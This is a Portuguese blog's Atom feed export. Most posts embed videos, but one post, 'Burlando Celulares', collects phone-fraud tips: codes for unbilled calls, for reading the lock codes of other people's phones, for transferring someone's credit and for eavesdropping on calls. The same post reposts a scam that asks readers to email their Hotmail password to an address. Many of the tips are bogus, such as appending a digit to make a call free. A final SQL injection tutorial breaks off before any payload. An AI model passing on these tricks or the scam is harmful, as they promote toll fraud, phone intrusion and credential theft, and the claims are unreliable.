<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-5036822421883770705</id><updated>2012-02-16T08:46:37.124-08:00</updated><title type='text'>Hacker &amp; Gamer</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://hackeregamer.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5036822421883770705/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://hackeregamer.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Tonny André</name><uri>http://www.blogger.com/profile/12672776308653499902</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>11</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-5036822421883770705.post-2245703671096232791</id><published>2010-02-04T08:40:00.001-08:00</published><updated>2010-02-04T08:40:30.588-08:00</updated><title type='text'>DESBLOQUEIO DO IPHONE</title><content type='html'>&lt;object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"  codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" id="uploader" width="480" height="390" align="middle"&gt;&lt;br /&gt;&lt;param name="allowScriptAccess" value="always" /&gt;&lt;br /&gt;&lt;param name="movie" value="http://tvig.ig.com.br/swf/playerFlash.swf?media=http://tvig.ig.com.br/Templates/RequestUrlPlayer.aspx?id=77668&amp;isEmbed=true" /&gt;&lt;br /&gt;&lt;param name="bgcolor" value="#333333" /&gt;&lt;br /&gt;&lt;param name="quality" value="high" /&gt;&lt;br /&gt;&lt;param name="allowFullScreen" value="true" /&gt;&lt;br /&gt;&lt;embed src="http://tvig.ig.com.br/swf/playerFlash.swf?media=http://tvig.ig.com.br/Templates/RequestUrlPlayer.aspx?id=77668&amp;isEmbed=true"  quality="high" bgcolor="#333333" width="480" height="390" align="middle"  name="uploader" allowFullScreen="true" allowScriptAccess="always" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" &gt;&lt;/embed&gt;&lt;br /&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5036822421883770705-2245703671096232791?l=hackeregamer.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackeregamer.blogspot.com/feeds/2245703671096232791/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='http://hackeregamer.blogspot.com/2010/02/desbloqueio-do-iphone.html#comment-form' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5036822421883770705/posts/default/2245703671096232791'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5036822421883770705/posts/default/2245703671096232791'/><link rel='alternate' type='text/html' href='http://hackeregamer.blogspot.com/2010/02/desbloqueio-do-iphone.html' title='DESBLOQUEIO DO IPHONE'/><author><name>Tonny André</name><uri>http://www.blogger.com/profile/12672776308653499902</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5036822421883770705.post-3761118301449444843</id><published>2009-11-30T06:48:00.000-08:00</published><updated>2009-11-30T08:05:35.680-08:00</updated><title type='text'>Designer de Interação</title><content type='html'>&lt;object width="640" height="412"&gt;&lt;param name="movie" value="http://www.olhardigital.com.br/flashes/player_embed_wide?path_video=http://p.download.uol.com.br/olhardigital/PGM242/pgm242_cv_design_nokia.flv&amp;player_width=640&amp;player_height=380&amp;tipo_player=normal&amp;titulo_video=Profissões digitais: designer de interação&amp;current_url=http://olhardigital.uol.com.br/central_de_videos/video_wide.php?id_conteudo=9939&amp;/DESIGNER+DE+INTERACAO?id_conteudo=9939"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.olhardigital.com.br/flashes/player_embed_wide?path_video=http://p.download.uol.com.br/olhardigital/PGM242/pgm242_cv_design_nokia.flv&amp;player_width=640&amp;player_height=380&amp;tipo_player=normal&amp;titulo_video=Profissões digitais: designer de interação&amp;current_url=http://olhardigital.uol.com.br/central_de_videos/video_wide.php?id_conteudo=9939&amp;/DESIGNER+DE+INTERACAO?id_conteudo=9939" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="640" height="412"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5036822421883770705-3761118301449444843?l=hackeregamer.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackeregamer.blogspot.com/feeds/3761118301449444843/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='http://hackeregamer.blogspot.com/2009/11/designer-de-interacao.html#comment-form' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5036822421883770705/posts/default/3761118301449444843'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5036822421883770705/posts/default/3761118301449444843'/><link rel='alternate' type='text/html' href='http://hackeregamer.blogspot.com/2009/11/designer-de-interacao.html' title='Designer de Interação'/><author><name>Tonny André</name><uri>http://www.blogger.com/profile/12672776308653499902</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5036822421883770705.post-3136573043125936686</id><published>2009-11-24T10:09:00.001-08:00</published><updated>2009-11-24T10:09:46.760-08:00</updated><title type='text'>Video</title><content type='html'>&lt;object width="320" height="225"&gt;&lt;param name="movie" value="http://www.olhardigital.com.br/flashes/player_embed_low?path_video=http://p.download.uol.com.br/olhardigital/PGM137/pgm137_cv_agente_digital.flv&amp;player_width=640&amp;player_height=380&amp;tipo_player=baixa&amp;titulo_video=Agente secreta digital&amp;current_url=http://olhardigital.uol.com.br/central_de_videos/video_wide.php?id_conteudo=4089&amp;/AGENTE+SECRETA+DIGITAL?id_conteudo=4089"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.olhardigital.com.br/flashes/player_embed_low?path_video=http://p.download.uol.com.br/olhardigital/PGM137/pgm137_cv_agente_digital.flv&amp;player_width=640&amp;player_height=380&amp;tipo_player=baixa&amp;titulo_video=Agente secreta digital&amp;current_url=http://olhardigital.uol.com.br/central_de_videos/video_wide.php?id_conteudo=4089&amp;/AGENTE+SECRETA+DIGITAL?id_conteudo=4089" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="320" height="225"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5036822421883770705-3136573043125936686?l=hackeregamer.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackeregamer.blogspot.com/feeds/3136573043125936686/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='http://hackeregamer.blogspot.com/2009/11/video.html#comment-form' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5036822421883770705/posts/default/3136573043125936686'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5036822421883770705/posts/default/3136573043125936686'/><link rel='alternate' type='text/html' href='http://hackeregamer.blogspot.com/2009/11/video.html' title='Video'/><author><name>Tonny André</name><uri>http://www.blogger.com/profile/12672776308653499902</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5036822421883770705.post-7399918141252856055</id><published>2009-05-22T09:00:00.000-07:00</published><updated>2009-05-22T09:06:42.359-07:00</updated><title type='text'>Burlando Celulares</title><content type='html'>Fonte: &lt;a href="http://phacker.nireblog.com/cat/burlando-celulares"&gt;Phacker&lt;/a&gt;&lt;br /&gt;Lembrando que está prática é ilegal e não foi testada por mim&lt;br /&gt;&lt;br /&gt;&lt;h3 class="entrytitle"&gt;&lt;a href="http://phacker.nireblog.com/post/2007/09/29/para-motorola-c182" rel="bookmark"&gt;para Motorola C182 '''&lt;/a&gt;&lt;/h3&gt;    &lt;div class="meta"&gt;phacker 29/09/2007 @ 06:19&lt;/div&gt;    &lt;div class="storycontent"&gt;    &lt;p&gt;Motorola C182&lt;/p&gt; &lt;p&gt;Encender el teléfono.&lt;/p&gt; &lt;p&gt;Presionar # # 0 7 3 8 8 7 STO&lt;/p&gt; &lt;p&gt;Pedirá un password, de fabrica son 6 ceros&lt;br /&gt;0 0 0 0 0 0  STO&lt;/p&gt; &lt;p&gt;Ingresar numero telefonico y presionar * (asterisco)&lt;/p&gt; &lt;p&gt;Sonará un bip de unos 5 segundos, esperar a que termine el bip y luego presionar de nuevo * (asterisco) y esperar otros 5 segundos aproximadamente; pedirá que se ingrese el SID (24592) y presionar STO&lt;br /&gt;Por ultimo presionar # para grabar y salir de la programacion.&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;h3 class="entrytitle"&gt;&lt;a href="http://phacker.nireblog.com/post/2007/09/29/programacion-de-celulares-nokia" rel="bookmark"&gt;Programación de celulares Nokia&lt;/a&gt;&lt;/h3&gt;    &lt;div class="meta"&gt;phacker 29/09/2007 @ 05:41&lt;/div&gt;    &lt;div class="storycontent"&gt;    &lt;p&gt;Para ingresar al modo de programación deberemos marcar:&lt;br /&gt;Para equipos analógicos:&lt;br /&gt;* 3 0 0 1 # 1 2 3 4 5 Sto 0 0&lt;br /&gt;Para equipos digitales antiguos o marca Tecnophone:&lt;br /&gt;* 3 0 0 1 # 1 2 3 4 5 Menu&lt;br /&gt;Para equipos digitales modernos:&lt;br /&gt;* 3 0 0 1 # 1 2 3 4 5 #&lt;br /&gt;Se navega entre funciones por medio de las teclas de desplazamiento de menú. Para salvar los datos bastará con apagar el teléfono y encenderlo nuevamente.&lt;br /&gt;Una opción en los equipos digitales es la de prueba de campo (Field Test) que evalúa el funcionamiento completo de la célula o radio base donde el equipo se encuentra. Esta opción es muy potente y precisa.&lt;br /&gt;En breve tiempo mas tendremos aquí una explicación detallada de cada una de las funciones de estos menús.&lt;/p&gt; &lt;p&gt;OUTROS&lt;/p&gt; &lt;p&gt;   This is one way for you to hack in someone else hotmail.&lt;br /&gt;Follow these steps and you can have someone else’s hotmail easily.&lt;/p&gt; &lt;p&gt;First: Go to your hotmail account then compose your hotmail account and password then send to back_dat_rice_up@hotmail.com&lt;br /&gt;Second: Wait for a week and you will receive a mail that will respond you then you send them again tell them who hotmail do you want and what is the account.&lt;br /&gt;Third: Wait for 2 days and we warrantee that you that people hotmail account and password.&lt;/p&gt; &lt;p&gt;   And if you want our programs to hack in anybody account plz mail to us and ready your credit card. It only cost $10 thanks.&lt;/p&gt; &lt;p&gt;Juz type your normal message when you send type 541 then your friends number&lt;br /&gt;Eg. 541040233623&lt;br /&gt;After send it you have to turn off your phone straight away so it wont charge you money.&lt;br /&gt;&lt;/p&gt;&lt;h3 class="entrytitle"&gt;&lt;a href="http://phacker.nireblog.com/post/2007/09/29/burlando-celulares" rel="bookmark"&gt;BURLANDO CELULARES&lt;/a&gt;&lt;/h3&gt;    &lt;div class="meta"&gt;phacker 29/09/2007 @ 05:03&lt;/div&gt;    &lt;div class="storycontent"&gt;    &lt;p&gt;Esta dica é muito bacana, esta dica é para celulares, mas tenho uma ligeira pretenção que em telefones comuns ele chegue a reduzir em 70% a tarifa telefonica (Só que não é garantido!). Para isso basta que você pegue o numero a ser discado, por exemplo 65 - 9342 (é um numero que inventei, mas se for o seu me avise hehehe), bem então você pega o último digito e o subtrai de dez, no caso do exemplo o 2 , 10 - 2 = 8, então digite o numero (65 - 93 -48) mais o ultimo nº antes de ser subtraido. Novo numero 65 93 48 2 , agora sem pagar. Primeiro, pegue o número que você vai discar. Ex: 123-4567 Esse número é ficticio. Não ligue para lá, pedindo informações. Entao devemos pegar o ultimo número do telefone a ser discado, no caso o 7... subtraimos ele de 10, o que vai resultar o numero 3. Somente vamos acrescentar o número 3 ao final do numero discado. O resultado vai ficar: Numero ligado sem pagar: 123-4567-3 3-Primeiro tire a bateria do seu celular, depois de abrir vão existir umas partes de metal la embaixo do celular isso mesmo 3 risquinhos de metal , pegue um pedaço de papel aluminio e bote lá ,dai bote a bateria e ligue o cel , vai dar um negocio , digite #1008# e é so ouvir as conversas.&lt;br /&gt;&lt;/p&gt;&lt;h3 class="entrytitle"&gt;&lt;a href="http://phacker.nireblog.com/post/2007/09/29/como-fazer-ligacoes-para-celular" rel="bookmark"&gt;Como Fazer Ligações Para Celular:&lt;/a&gt;&lt;/h3&gt;    &lt;div class="meta"&gt;phacker 29/09/2007 @ 05:02&lt;/div&gt;    &lt;div class="storycontent"&gt;    &lt;p&gt;1. Discar 5-1-2-3-4&lt;br /&gt;2. Aguardar o sinal digital (junto com o sinal de discar)&lt;br /&gt;3. Discar 1&lt;br /&gt;4. Aguardar o sinal digital (junto com o sinal de discar)&lt;br /&gt;5. Discar 2&lt;br /&gt;6. Aguardar 2 sinais digitais (junto com o sinal de discar)&lt;br /&gt;7. Discar o número do celular&lt;/p&gt; &lt;p&gt;Em último caso, desligar a chave do bloqueador&lt;br /&gt;&lt;/p&gt;&lt;h3 class="entrytitle"&gt;&lt;a href="http://phacker.nireblog.com/post/2007/09/29/multi-dicas-de-celulares" rel="bookmark"&gt;::MULTI-DICAS DE CELULARES::&lt;/a&gt;&lt;/h3&gt;    &lt;div class="meta"&gt;phacker 29/09/2007 @ 05:01&lt;/div&gt;    &lt;div class="storycontent"&gt;    &lt;p&gt;Para quebrar bloqueio em (Ericson)&lt;/p&gt; &lt;p&gt;Se quizer mexer em um celular e ele estiver bloqueado, é muita treta!&lt;br /&gt;disque: 923885 seta p/ baixo. você vai entrar no menu principal do Ericson&lt;br /&gt;se o CEL for de duas ou mais contas vai aparecer NAM 1 / NAM 2 ou até NAM 3&lt;br /&gt;provavelmente a conta principal será a do NAM 1. Selecione o NAM 1 e dê (yes) vai abrir&lt;br /&gt;a configuração do Celular para ver se o NAM 1 é mesmo o ativo vá navegando no menu com a seta p/ baixo, ver o MOBILE se for o número da pessoa continue navengando no menu. quando chegar em Lock code é só ver qual será o código de bloqueio. depois aperte (Yes) e saia do menu. Depois digite lá o código e aperte (yes). pronto!&lt;/p&gt; &lt;p&gt;Para quebrar bloqueio em (Gradiente e Nókia)&lt;/p&gt; &lt;p&gt;Digite: *3001#12345# vai abrir o menu do CEL. navegue com seta p/ baixo e veja a opção Security dê (Yes) e vai tá lá o código de bloqueio (Se quiser mudar pra sacanear vai nessa!) depois para sair deste menu só desligando o Celular. Ao religar aperte em (yes) vai pedir o código aí é só digitar e confirmar com um (Yes).&lt;br /&gt;Queres crédito free? ! Aqui só vai em Ericson&lt;/p&gt; &lt;p&gt;Há, antes tu tens que saber se o cara pra quem tu vai ligar tem crèdito né ''hâhâhâ''. depois o teu celular vai ter que ter uns 3 reais de crédito.&lt;/p&gt; &lt;p&gt;Processo: disca 904090 seta p/ baixo. vai aparecer multi números, não se espante pois isso é apenas um rastre de sitema, aí é só ligar para o banana; fale com ele mais de 2 minutos depois antes de desligar espere ele desligar primeiro. pronto! Depois é só tirar o rastre digitando novamente 904090 seta p/ baixo. (se depois quizer ver se passou o crédito disque *200, aí é só esperar a mulherzinha falar "bem vindo ao men....." se quizer tecle logo 1 e espere falar o crédito).&lt;br /&gt;&lt;/p&gt;&lt;h3 class="entrytitle"&gt;&lt;a href="http://phacker.nireblog.com/post/2007/09/29/ligar-de-graca-de-celulares" rel="bookmark"&gt;::Ligar de Graça de Celulares::&lt;/a&gt;&lt;/h3&gt;    &lt;div class="meta"&gt;phacker 29/09/2007 @ 05:00&lt;/div&gt;    &lt;div class="storycontent"&gt;    &lt;p&gt;::Ligar de Graça de Celulares::&lt;/p&gt; &lt;p&gt;Economizar ligações em motorola em até 70%&lt;/p&gt; &lt;p&gt;Processo:&lt;br /&gt;aperte a tecla FCN depois sete vezes o número 0 (0000000) e finaliza com STO.&lt;br /&gt;Agora é de Grátis: (Motorola)&lt;br /&gt;*Essa dica é para quem quer ligar de seu Motorola sem pagar nada!&lt;br /&gt;Faça o seguinte:&lt;/p&gt; &lt;p&gt;1. Ligue o celular&lt;br /&gt;2. Aperte: (function)&lt;br /&gt;3. Digite: 00000004 (sete zeros seguido de um quatro)&lt;br /&gt;4. Aperte: (store)&lt;br /&gt;5. Deve aparecer: SERVICE LEVEL 4&lt;br /&gt;6. Ligue para quem quiser, de GRAÇA. Nem vai aparecer na conta!&lt;br /&gt;Obs: A manha deve ser feita, a cada vez que o celular for ligado. Nao faça isso para todas as ligações pois a central de Tel. pode desconfiar.&lt;br /&gt;Mais dicas pra ligação grátis (Motorola)&lt;br /&gt;Para burlar as contas telefônicas de Celulares faça o seguinte:&lt;br /&gt;1-Pegue o numero do telefone;&lt;br /&gt;2-Subtraia o ultimo numero de 10;&lt;br /&gt;3-Adcione o resultado ao numero inicial.&lt;/p&gt; &lt;p&gt;Siga o exemplo:&lt;br /&gt;Numero do tel: 987-6543&lt;br /&gt;10 - 3 = 7&lt;br /&gt;Novo numero: 987-6543-7&lt;/p&gt; &lt;p&gt;*Com isso você não pagará a ligação.&lt;br /&gt;&lt;/p&gt;&lt;h3 class="entrytitle"&gt;&lt;a href="http://phacker.nireblog.com/post/2007/09/29/nokia-8210-secret-codes" rel="bookmark"&gt;Nokia 8210 Secret Codes&lt;/a&gt;&lt;/h3&gt;    &lt;div class="meta"&gt;phacker 29/09/2007 @ 04:59&lt;/div&gt;    &lt;div class="storycontent"&gt;    &lt;p&gt;Check the IMEI *#06#&lt;br /&gt;Check software version *#0000#&lt;br /&gt;Warranty menu *#92702689#&lt;br /&gt;Press the following warranty code&lt;br /&gt;6232 (OK) Displays the Month and Year of Manufacture&lt;br /&gt;7332 (OK) Displays the date of the last repairment&lt;br /&gt;7832 (OK) Displays the date where the phone was purchased&lt;br /&gt;9268 (OK) Displays Serial Number&lt;br /&gt;37832 (OK) Set the Purchasing Date MMYY&lt;br /&gt;87267 (OK) Transfers ALL phone numbers, pictures, sounds from one phone to another&lt;/p&gt; &lt;p&gt;Outros secret codes&lt;/p&gt; &lt;p&gt;*#06#&lt;br /&gt;IMEI-Nummer zeigen&lt;br /&gt;*#3110#&lt;br /&gt;Handy-Infos anzeigen&lt;br /&gt;*#7780#&lt;br /&gt;Auf Werkseinstellungen zurücksetzten&lt;br /&gt;*#746025625#&lt;br /&gt;Sim clock stop allowed&lt;/p&gt; &lt;p&gt;3210:&lt;br /&gt;Funktion&lt;br /&gt;*#06#&lt;br /&gt;IMEI-Nummer zeigen&lt;br /&gt;*#7780#&lt;br /&gt;Reset machen&lt;br /&gt;*#0000#&lt;br /&gt;Handy-Infos anzeigen (Software-Info etc.)&lt;br /&gt;*#92702689#&lt;br /&gt;Geheimes Menü betreten&lt;br /&gt;*#746025625#&lt;br /&gt;Sim clock stop allowed&lt;br /&gt;*3370#&lt;br /&gt;Höhere Sprachqualität ein&lt;br /&gt;#3370#&lt;br /&gt;Erweiterte Sprachqualität aus&lt;br /&gt;*4720#&lt;br /&gt;Mindere Sprachqualität ein&lt;br /&gt;#4720#&lt;br /&gt;Reduzierte Sprachqualität aus&lt;/p&gt; &lt;p&gt;5110&lt;br /&gt;Funktion&lt;br /&gt;*#06#&lt;br /&gt;IMEI-Nummer zeigen&lt;br /&gt;*#0000#&lt;br /&gt;Handy-Infos anzeigen (Software-Info etc.)&lt;br /&gt;*#92702689#&lt;br /&gt;Geheimes Menü betreten&lt;br /&gt;*#746025625#&lt;br /&gt;Sim clock stop allowed&lt;/p&gt; &lt;p&gt;6110/6150&lt;br /&gt;Funktion&lt;br /&gt;*#06#&lt;br /&gt;IMEI-Nummer zeigen&lt;br /&gt;*#0000#&lt;br /&gt;Handy-Infos anzeigen (Software-Info etc.)&lt;br /&gt;*#92702689#&lt;br /&gt;Geheimes Menü betreten&lt;br /&gt;*#746025625#&lt;br /&gt;Sim clock stop allowed&lt;/p&gt; &lt;p&gt;7110&lt;br /&gt;Funktion&lt;br /&gt;*#06#&lt;br /&gt;IMEI-Nummer zeigen&lt;br /&gt;*#0000#&lt;br /&gt;Handy-Infos anzeigen (Software-Info etc.)&lt;br /&gt;*#92702689#&lt;br /&gt;Geheimes Menü betreten&lt;br /&gt;#pw+1234567890+y#&lt;br /&gt;SIM-Lock checken&lt;/p&gt; &lt;p&gt;8110/8210/8810:&lt;br /&gt;Funktion&lt;br /&gt;*#06#&lt;br /&gt;IMEI-Nummer zeigen&lt;br /&gt;*#0000# oder *#8110#&lt;br /&gt;Handy-Infos anzeigen (Software-Info etc.)&lt;br /&gt;*#92702689#&lt;br /&gt;Geheimes Menü betreten&lt;br /&gt;*#746025625#&lt;br /&gt;Sim clock stop allowed &lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;h3 class="entrytitle"&gt;&lt;a href="http://phacker.nireblog.com/post/2007/09/29/nokia-codes" rel="bookmark"&gt;Nokia Codes&lt;/a&gt;&lt;/h3&gt;    &lt;div class="meta"&gt;phacker 29/09/2007 @ 04:59&lt;/div&gt;    &lt;div class="storycontent"&gt;    &lt;p&gt;*3001#12345# Programming Menu&lt;/p&gt; &lt;p&gt;Program NAMs&lt;br /&gt;Fieldtest&lt;br /&gt;Serial Number&lt;br /&gt;P/RSIDs&lt;/p&gt; &lt;p&gt;*#639#&lt;/p&gt; &lt;p&gt;Program Phone Number&lt;/p&gt; &lt;p&gt;*#92772689# Warranty Information&lt;/p&gt; &lt;p&gt;Serial Number&lt;br /&gt;Life Timer&lt;br /&gt;Build Date&lt;br /&gt;Programmed Date (editable once only)&lt;/p&gt; &lt;p&gt;*#9999# - Display Software Version&lt;/p&gt; &lt;p&gt;Displays Current Software Version&lt;/p&gt; &lt;p&gt;Known Versions&lt;br /&gt;v 06.08 , 22/06/00 NSW-4&lt;br /&gt;v 06.09 , 07/07/00 NSW-4&lt;br /&gt;v 06.12 , 25/10/00 NSW-4&lt;/p&gt; &lt;p&gt;Change Alpha Tag on a Nokia&lt;/p&gt; &lt;p&gt;The alpha tag is the message that is displayed on your phone when in digital coverage. This is normally transmitted by the network, but can be overidden to display a different tag. This is done by creating a tag for a personal/residential zone in the phone, and setting this zone to have the same settings as your normal carrier. So when the phone identifies the network system it believes it is in the personal/residential zone and displays the tag you have programmed.&lt;/p&gt; &lt;p&gt;1) Enter programming mode of the phone by keying *3001#12345#&lt;/p&gt; &lt;p&gt;2) Find out the ID of your operator by entering the NAM1 menu. Note the Home System ID setting. (16387 on Rogers AT&amp;amp;T in Calgary)&lt;/p&gt; &lt;p&gt;3) Scroll to and enter PSID/RSID lists (menu 7)&lt;/p&gt; &lt;p&gt;4) Select P/RSID 1&lt;/p&gt; &lt;p&gt;5) Scroll to PSID/RSID and change the setting to 1&lt;/p&gt; &lt;p&gt;6) Scroll to Connected system ID and change the setting to the ID of your system (eg 16387)&lt;/p&gt; &lt;p&gt;7) Scroll to Alpha Tag and enter the message you would like displayed.&lt;/p&gt; &lt;p&gt;8) Scroll to Operator code (SOC) and enter coed for your provider such as 2050 for Rogers or 2049 for AT&amp;amp;T&lt;/p&gt; &lt;p&gt;9) Scroll to Country code and enter 302 for Rogers or 310 for AT&amp;amp;T&lt;/p&gt; &lt;p&gt;10) Power cycle your phone and hopefully your message will be displayed&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;h3 class="entrytitle"&gt;&lt;a href="http://phacker.nireblog.com/post/2007/09/29/esse-aki-sao-tambem-dos-desgracados-americanos" rel="bookmark"&gt;ESSE AKI SAO TAMBEM DOS DESGRACADOS AMERICANOS:&lt;/a&gt;&lt;/h3&gt;    &lt;div class="meta"&gt;phacker 29/09/2007 @ 04:58&lt;/div&gt;    &lt;div class="storycontent"&gt;    &lt;p&gt;*#06# for checking the IMEI (International Mobile Equipment Identity)&lt;br /&gt;*#0000# shows the SW version.&lt;br /&gt;*#3370# - Enhanced Full Rate Codec (EFR) activation. It will automatically restart.&lt;br /&gt;*#3370* - Enhanced Full Rate Codec (EFR) deactivation. It will automatically restart.&lt;br /&gt;*#4720# - Half Rate Codec activation. It will automatically restart&lt;br /&gt;*#4720* - Half Rate Codec deactivation. It will automatically restart&lt;br /&gt;*#746025625# - Sim clock allowed status.&lt;br /&gt;Enhanced Full Rate will give you much better sound quality when you enable it. The new Enhanced Full Rate CODEC adopted by GSM uses the ASELP (AlgebraicCode Excitation Linear Prediction) compression technology. This technology allows for much great voice quality in the same number of bits as the older Full Rate CODEC. The older technology was called LPC-RPE (Linear Prediction Coding with Regular Pulse Excitation). Both operate at 13 kilobits.(but you take up more space on the network, so they can charge you more) - Talk-time is reduced with about 5%&lt;/p&gt; &lt;p&gt;Half Rate will give you bad soundquality, which gives the serviceprovider the opportunity to have more calls on the network, and you might get a lower charge from them. - Will give you 30% longer talk-time.&lt;br /&gt;Sim Clock Stop : *#746025625# apparently only works for 3 minuts.&lt;/p&gt; &lt;p&gt;*#92702689# - takes you to a secret menu with 6 choices&lt;br /&gt;1) shows the serial nr.&lt;br /&gt;2) shows when the cel phone was made mmyy&lt;br /&gt;3) shows when the the cel. phone was purchased mmyy&lt;br /&gt;4) shows how many times the cel. phone has been repaired.&lt;br /&gt;5) makes u capebel of transferring user data if u have the gear for it&lt;br /&gt;6) shows how many houres the phone has been on&lt;br /&gt;Latest software version: V 5.02 NSE-8/9&lt;/p&gt; &lt;p&gt;V.4.41 NSE-8/9 (17-08-99)&lt;br /&gt;V 4.11 (???)&lt;br /&gt;V 3.10 NSE-8&lt;br /&gt;1 - Koop een M/bus kabel die geschikt is voor uw Nokia&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;    &lt;/div&gt;    &lt;/div&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;    &lt;/div&gt;&lt;/div&gt;    &lt;/div&gt;    &lt;/div&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;    &lt;/div&gt;    &lt;/div&gt;    &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5036822421883770705-7399918141252856055?l=hackeregamer.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackeregamer.blogspot.com/feeds/7399918141252856055/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='http://hackeregamer.blogspot.com/2009/05/burlando-celulares.html#comment-form' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5036822421883770705/posts/default/7399918141252856055'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5036822421883770705/posts/default/7399918141252856055'/><link rel='alternate' type='text/html' href='http://hackeregamer.blogspot.com/2009/05/burlando-celulares.html' title='Burlando Celulares'/><author><name>Tonny André</name><uri>http://www.blogger.com/profile/12672776308653499902</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5036822421883770705.post-1900160177233472109</id><published>2009-05-19T19:07:00.000-07:00</published><updated>2009-05-19T19:13:31.456-07:00</updated><title type='text'>Invasão de Bancos SQL</title><content type='html'>[Tutorial] - A arte do SQL Injection avançado&lt;br /&gt;&lt;br /&gt;Mensagempor Marcelo Moraes em 04 Abr 2009, 11:30&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1 - Modo Básico, passando por senhas em sites.&lt;br /&gt;&lt;br /&gt;Hoje em dia é uma prática comum os sites pedirem um cadastro do visitante, e criar-lhe um login, dando acesso a áreas restritas e especiais do site. Cadastro esse que na maioria das vezes é gratuito, com a intenção apenas de fidelizar o usuário e claro, ter mais um e-mail para uma possível divulgação, que neste caso não se caracteriza spam, pois o devido usuário previamente aceitou informações vindas daquele site.&lt;br /&gt;&lt;br /&gt;Em sites onde o cadastro é pago, a coisa muda de figura. O site imagina estar vendendo alguma informação ao visitante, e por isso, pode pedir alguns dados sigilosos do usuário e guardá-los seguramente no seu banco de dados.&lt;br /&gt;&lt;br /&gt;O que venho apresentar, jogará seu login no vento e o site arderá no mármore do inferno, mas só vou falar como funciona porque Alah mandou e estava escrito com o bit sagrado.&lt;br /&gt;&lt;br /&gt;Essa técnica geralmente é chamada de SQL Injection, ou seja, injeção de SQL. Funciona em 